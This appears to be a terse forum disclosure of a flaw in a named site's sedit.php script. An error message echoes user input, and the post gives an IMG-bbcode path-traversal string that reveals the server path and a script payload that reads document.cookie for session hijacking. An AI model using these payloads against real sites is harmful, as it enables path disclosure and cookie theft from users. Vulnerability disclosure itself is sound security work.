vulnerable script "http://www.antionline.com/sedit.php"
variable "message"

error :
Warning: getimagesize(): Read error! in /data/****/***/sedit.php on line 104

the error page could be used for hijacking because the passed data which causes the error is used in the error page.

XSS : post method.

code:

Code:
[IMG bbcode]/.././.[/IMGbbcode]  path dis.
[IMGbbcode]<script>alert(document.cookie)</script>[/IMGbbcode] hija.